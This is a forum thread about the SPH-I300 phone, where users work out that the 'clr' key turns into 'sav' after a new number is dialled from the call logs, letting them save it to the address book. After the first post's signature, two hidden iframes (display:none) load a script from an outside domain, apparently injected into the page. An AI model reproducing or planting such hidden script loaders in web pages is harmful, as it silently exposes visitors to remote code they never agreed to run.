+ Reply to Thread

Question 'clr' vs 'sav' on phone keypad

The other day I was messing around with my SPH-I300 and somehow managed to do something that resulted in the 'clr' on the phone pad turning into 'sav'. I was able to push the 'sav' button and the address book was automatically launched with the number populated into the first available field, then all I had to do was fill in the name using graphiti...

Now, of course, I can't figure out what I did to get there. Anyone else seen this?

Thanks,

Doug<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

JLF

happens after a phone call ?

i noticed this as well. I think it happens during or after a phone call. In my case, I received an incoming call with Caller ID. After I finished the call, i noticed the "SAV" button where the "CLR " button used to be...

I thought I had seen it there, but just tested and it didn't show up this time.

Smile 'clr' vs 'save'

Well...I was finally able to duplicate at least part of what I was looking for...

If you select a call out of the call logs (outgoing, incoming or missed) and dial it using the menu selection, after completing the call, the number flashes for a few seconds and the 'clr' changes to 'save' while it flashes.

If you hit the 'save' button...it brings you right to the new entry screen in address book, populates the number in the 'work' field. Then you can fill in the name, etc. or just say 'done' and go back and complete the rest of the entry later...

'clr' vs 'save'

One additional note...the phone seems to be smart enough to know if an entry is already in your address book and won't give you the 'save' option unless it really is a new entry...

I'd be interested in other's experiences here if you want to fool around with it some...